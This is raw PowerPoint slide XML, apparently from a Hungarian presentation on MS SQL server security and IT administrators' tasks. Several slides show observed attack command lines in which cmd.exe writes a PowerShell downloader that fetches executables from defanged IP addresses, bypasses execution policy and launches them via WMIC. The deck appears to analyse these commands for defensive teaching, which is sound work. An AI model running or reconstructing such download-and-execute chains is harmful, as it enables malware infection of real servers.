              </a:rPr>
              <a:t>M</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="4754" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00BBC5"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>S</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="4754" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00BBC5"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> SQL</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4754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6551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441544" y="41657"/>
            <a:ext cx="805816" cy="162225"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="15876" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:spcBef>
                <a:spcPts val="126"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="950" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="8DC53E"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>FOR</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="950" spc="60" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="8DC53E"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="950" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="8DC53E"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>PARTNERS</a:t>
            </a:r>
            <a:endParaRPr sz="950">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="23" name="Kép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134975" y="0"/>
              <a:ext cx="5153025" cy="615302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5038725"/>
              <a:ext cx="4076700" cy="524827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706725" y="4181475"/>
              <a:ext cx="2581275" cy="610552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20025" y="5038725"/>
              <a:ext cx="10467975" cy="524827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763000" y="1400175"/>
              <a:ext cx="7243826" cy="735812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43075" y="4076636"/>
              <a:ext cx="185737" cy="17621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43075" y="4590986"/>
              <a:ext cx="185737" cy="18573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43075" y="5114861"/>
              <a:ext cx="185737" cy="17621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43075" y="5629211"/>
              <a:ext cx="185737" cy="18573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43075" y="6143561"/>
              <a:ext cx="185737" cy="18573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743075" y="6667436"/>
              <a:ext cx="185737" cy="18573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743075" y="7181786"/>
              <a:ext cx="185737" cy="18573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743075" y="7705661"/>
              <a:ext cx="185737" cy="18573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743075" y="8220011"/>
              <a:ext cx="185737" cy="185737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2057400" y="4012566"/>
            <a:ext cx="2952116" cy="4494180"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="15876" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700" algn="just">
              <a:spcBef>
                <a:spcPts val="126"/>
              </a:spcBef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Felhasználók</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="10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támogatása</a:t>
            </a:r>
            <a:endParaRPr sz="2000" dirty="0">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="12700" marR="976630" algn="just">
              <a:lnSpc>
                <a:spcPts val="4120"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="330"/>
              </a:spcBef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Szoftver</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="20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felügyelet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Hardver</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="20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felügyelet Beszerzések</a:t>
            </a:r>
            <a:endParaRPr sz="2000" dirty="0">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="12700">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef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Hardver</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="6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karbantartás</a:t>
            </a:r>
            <a:endParaRPr sz="2000" dirty="0">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="12700" marR="5080">
              <a:lnSpc>
                <a:spcPct val="170400"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="26"/>
              </a:spcBef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Hálózat</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="6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karbantartás Rendszerfelügyelet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Felhasználói</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-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fiókok</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="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kezelése Biztonság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1735836" y="1857438"/>
            <a:ext cx="4033520" cy="1664687"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="203836" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700" marR="5080">
              <a:lnSpc>
                <a:spcPct val="79200"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1606"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="6000" dirty="0"/>
              <a:t>IT</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="6000" spc="-6" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="6000" spc="-10" dirty="0"/>
              <a:t>adminok </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="6000" dirty="0"/>
              <a:t>napi </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="6000" spc="-10" dirty="0"/>
              <a:t>teendői</a:t>
            </a:r>
            <a:endParaRPr sz="6000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="36919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8B04C-E187-16AF-8AB1-59A72B42C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Gradient TEAL" descr="A green light in the dark&#10;&#10;Description automatically generated with medium confidence">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{28D8E900-C3C8-7253-8977-5378A3C57E8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144721" y="-5037820"/>
            <a:ext cx="30087414" cy="18514850"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="!!Gradient PURPLE" descr="A purple line in the dark&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5917EB12-80D5-985A-F76C-42368361CD5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849229" y="1284780"/>
            <a:ext cx="30560502" cy="18285230"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="!!Gradient CRIMSON" descr="A red light in the dark&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{26A3AE67-D919-109E-0B19-2280A1C725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14407705" y="-5577283"/>
            <a:ext cx="13607400" cy="8690365"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="!!Gradient TEAL Fat" descr="A blue oval with black background&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{81901552-2846-BF72-1C0A-8F3C1E55CD0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-12354021" y="5703318"/>
            <a:ext cx="19335716" cy="13730680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7" hidden="1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9BA7C9CB-1104-94F0-9EB1-3F798728B9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78127" y="-67586"/>
            <a:ext cx="13425772" cy="10189508"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="122" name="Group 121">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8A620C96-916B-08FD-0AFD-3B5CE1CB5567}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="914400" y="1953783"/>
            <a:ext cx="16459200" cy="3185521"/>
            <a:chOff x="914400" y="2120365"/>
            <a:chExt cx="16459200" cy="3185521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A377501-0032-6911-66D2-1CEE63F4D93B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="914400" y="2120365"/>
              <a:ext cx="16459200" cy="3185521"/>
              <a:chOff x="9783551" y="1103017"/>
              <a:chExt cx="16459200" cy="3185521"/>
            </a:xfrm>
          </p:grpSpPr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D4CF5909-205B-2295-838A-7357471E1B85}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="9783551" y="1103017"/>
                <a:ext cx="16459200" cy="3185521"/>
              </a:xfrm>
              <a:prstGeom prst="roundRect">
                <a:avLst>
                  <a:gd name="adj" fmla="val 6307"/>
                </a:avLst>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="000D13"/>
              </a:solidFill>
              <a:ln>
                <a:solidFill>
                  <a:srgbClr val="424D56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K"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="29" name="Graphic 28">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EA99B6F0-635C-BF93-011F-CD00529DF5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rcRect/>
              <a:stretch/>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="10126322" y="1300398"/>
                <a:ext cx="549560" cy="335445"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="31" name="Rectangle: Rounded Corners 28">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E51F7A82-57AA-D796-21CA-BC4B01FF079E}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="9928226" y="1818602"/>
                <a:ext cx="16134415" cy="2395843"/>
              </a:xfrm>
              <a:prstGeom prst="roundRect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="1079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811382">
                  <a:defRPr/>
                </a:pP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%SYSTEM%\</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="2400" kern="0" err="1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cmd.exe</a:t>
                </a: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”C:\Windows\\System32\\</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="2400" kern="0" err="1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cmd.exe</a:t>
                </a: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” /C echo $cl = New-Object </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="2400" kern="0" err="1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System.Net.WebClient</a:t>
                </a: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&gt;C:?\</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="2400" kern="0" err="1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ProgramData</a:t>
                </a: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\\updt.ps1 &amp; echo $</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="2400" kern="0" err="1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cl.DownloadFile</a:t>
                </a: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(“</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="2400" kern="0" err="1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hxxp</a:t>
                </a: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://80.66.75[.]47/</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="2400" kern="0" err="1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Dxccaejs.exe</a:t>
                </a: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”, ”C:?\</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="2400" kern="0" err="1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ProgramData</a:t>
                </a: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\\</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="2400" kern="0" err="1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tzt.bat</a:t>
                </a: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”) &gt;&gt; C:?\</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="2400" kern="0" err="1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ProgramData</a:t>
                </a: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\\updt.ps1 &amp; </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="2400" kern="0" err="1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powershell</a:t>
                </a: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–</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="2400" kern="0" err="1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ExecutionPolicy</a:t>
                </a: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Bypass C:?\</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="2400" kern="0" err="1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ProgramData</a:t>
                </a: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\\updt.ps1 &amp; WMIC process call create ”C:?\</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="2400" kern="0" err="1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ProgramData</a:t>
                </a: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\\</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="2400" kern="0" err="1">
                    <a:solidFill>
                      <a:schemeClr val="bg1">
                        <a:lumMod val="65000"/>
                      </a:schemeClr>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                    <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  </a:rPr>
                  <a:t>tzt.bat</a:t>
                </a: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”</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="139" name="Rectangle: Rounded Corners 28">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{73FC2A57-C555-927A-FBED-DE76F25DE918}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1862260" y="2244337"/>
              <a:ext cx="6098468" cy="467642"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln cap="rnd">
              <a:noFill/>
              <a:round/>
            </a:ln>
            <a:effectLst>
              <a:glow rad="63500">
                <a:schemeClr val="accent4">
                  <a:alpha val="40000"/>
                </a:schemeClr>
              </a:glow>
              <a:outerShdw blurRad="381000" sx="102000" sy="102000" algn="ctr" rotWithShape="0">
                <a:srgbClr val="D80B55"/>
              </a:outerShdw>
            </a:effectLst>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0" anchor="ctr">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr defTabSz="1371600"/>
              <a:r>
                <a:rPr lang="en-US" sz="1600">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-lt"/>
                  <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>Administrator: C:\\Windows\system32\</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-lt"/>
                  <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>cmd.exe</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49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45585DE-BA79-7976-717C-D59CBA8E79CE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="914400" y="5498673"/>
            <a:ext cx="7961243" cy="3873927"/>
            <a:chOff x="9783551" y="1103017"/>
            <a:chExt cx="7961243" cy="3873927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D8C9DABD-4E2C-6A37-252D-0881397F66F6}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9783551" y="1103017"/>
              <a:ext cx="7961243" cy="3873927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solidFill>
                <a:srgbClr val="424D5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14" name="Rectangle: Rounded Corners 28">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BEA77F92-6A3A-4F18-46BA-8DC5E4FE79CF}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9928227" y="1888978"/>
              <a:ext cx="7279854" cy="2477128"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/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811382">
                <a:defRPr/>
              </a:pP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/C echo $cl = New-Object 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System.Net.WebClient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&gt;%TEMP%\updt.ps1 &amp; echo $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cl.DownloadFile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(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effectLst/>
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>"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effectLst/>
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>hXXp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effectLst/>
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>://80[.]66.75]]]].40/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effectLst/>
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>XXXXXXXXX.exe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effectLst/>
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>"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, 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effectLst/>
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>"%TEMP%\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effectLst/>
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>xxxx.exe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effectLst/>
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>"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) &gt;&gt; %TEMP%\updt.ps1 &amp; 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powershell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-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ExecutionPolicy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Bypass %TEMP%\updt.ps1 &amp; WMIC process call create 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effectLst/>
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>"%TEMP%\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effectLst/>
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>XXXXXXXX.exe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effectLst/>
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>"</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="2400" kern="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="8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0AB0934-361E-175A-8DC7-F440F0F0F91A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="9412357" y="5498673"/>
            <a:ext cx="7961243" cy="3873927"/>
            <a:chOff x="9783551" y="1103017"/>
            <a:chExt cx="7961243" cy="3873927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1FC7754A-CB53-70C7-9472-DC7143E0428F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9783551" y="1103017"/>
              <a:ext cx="7961243" cy="3873927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solidFill>
                <a:srgbClr val="424D5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20" name="Rectangle: Rounded Corners 28">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{516E85E5-3531-BA05-3D12-196CBFCC6290}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9928226" y="2068146"/>
              <a:ext cx="7746993" cy="2551461"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="10795" cap="flat" cmpd="sng" algn="ctr">
              <a:noFill/>
              <a:prstDash val="solid"/>
            </a:ln>
            <a:effectLst>
              <a:glow rad="63500">
                <a:schemeClr val="accent4">
                  <a:alpha val="40000"/>
                </a:schemeClr>
              </a:glow>
            </a:effectLst>
          </p:spPr>
          <p:txBody>
            <a:bodyPr rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr defTabSz="1811382">
                <a:defRPr/>
              </a:pP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"\"C:\\Windows\\\\System32\\\\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cmd.exe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\" /C echo $cl = New-Object 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System.Net.WebClient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&gt; C:\Users\MSSQLS~1\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AppData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\Local\Temp\updt.ps1 &amp; echo $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cl.DownloadFile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(\"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hxxp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://80.66.75[.]36/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aRX.exe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\", \"C:\Users\MSSQLS~1\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AppData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\Local\Temp\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tzt.exe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\") &gt;&gt; %TEMP%\\updt.ps1 &amp; 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powershell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-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ExecutionPolicy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Bypass C:\Users\MSSQLS~1\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AppData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\Local\Temp\updt.ps1 &amp; WMIC process call create \"C:\Users\MSSQLS~1\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AppData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\Local\Temp\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tzt.exe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\""</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="2400" kern="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="8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</p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="22" name="Graphic 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{198710B0-B644-E175-ECF9-5B13023474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823503" y="5840056"/>
            <a:ext cx="2004062" cy="368563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5DD28D56-6A0E-996A-E568-3A45881F0F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322317" y="5808437"/>
            <a:ext cx="2286000" cy="431800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Rectangle: Rounded Corners 28">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8B8633A8-B704-80ED-259E-62EE3630BDB2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="15215309" y="6290719"/>
            <a:ext cx="1828341" cy="467642"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF0000"/>
          </a:solidFill>
          <a:ln cap="rnd">
            <a:noFill/>
            <a:round/>
          </a:ln>
          <a:effectLst>
            <a:glow rad="63500">
              <a:schemeClr val="accent4">
                <a:alpha val="40000"/>
              </a:schemeClr>
            </a:glow>
            <a:outerShdw blurRad="381000" sx="102000" sy="102000" algn="ctr" rotWithShape="0">
              <a:srgbClr val="D80B55"/>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0" anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" defTabSz="1371600"/>
            <a:r>
              <a:rPr lang="en-GB" sz="20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/C echo $cl</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="200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26" name="Rectangle: Rounded Corners 28">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8D6979D5-DBC2-4583-68F2-9A83434FE134}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9412769" y="2889200"/>
            <a:ext cx="2023579" cy="467642"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF0000"/>
          </a:solidFill>
          <a:ln cap="rnd">
            <a:noFill/>
            <a:round/>
          </a:ln>
          <a:effectLst>
            <a:glow rad="63500">
              <a:schemeClr val="accent4">
                <a:alpha val="40000"/>
              </a:schemeClr>
            </a:glow>
            <a:outerShdw blurRad="381000" sx="102000" sy="102000" algn="ctr" rotWithShape="0">
              <a:srgbClr val="D80B55"/>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0" anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" defTabSz="1371600"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" kern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/C echo $cl</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="240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5" name="Rectangle: Rounded Corners 28">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D782120F-A1AF-5A95-A1A8-A6FBD7FE5837}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1187611" y="6375724"/>
            <a:ext cx="1696017" cy="467642"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF0000"/>
          </a:solidFill>
          <a:ln cap="rnd">
            <a:noFill/>
            <a:round/>
          </a:ln>
          <a:effectLst>
            <a:glow rad="63500">
              <a:schemeClr val="accent4">
                <a:alpha val="40000"/>
              </a:schemeClr>
            </a:glow>
